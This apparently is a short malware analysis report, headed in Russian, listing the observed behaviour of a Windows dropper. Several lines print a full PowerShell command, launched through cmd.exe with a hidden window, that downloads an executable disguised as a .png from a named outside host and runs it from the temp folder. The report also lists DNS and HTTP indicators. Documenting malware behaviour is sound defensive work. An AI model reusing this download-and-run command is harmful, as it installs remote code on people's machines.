Техническая информация
- http://artslogan.com.br/images/jhfkjsdhfntnt.png как %temp%\yatzxwe.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://artslogan.com.br/images/jhfkjsdhfntnt.png','%TMP%\yatzxwe.exe');Start-Process '%TMP%\yatzxwe.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1352
- %TEMP%\1101491.cvr
- 'ar####gan.com.br':80
- http://ar####gan.com.br/images/jhfkjsdhfntnt.png
- DNS ASK ar####gan.com.br
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://artslogan.com.br/images/jhfkjsdhfntnt.png','%TMP%\yatzxwe.exe');Start-Process '%TMP%\yatzxwe.exe';' (со скрытым окном)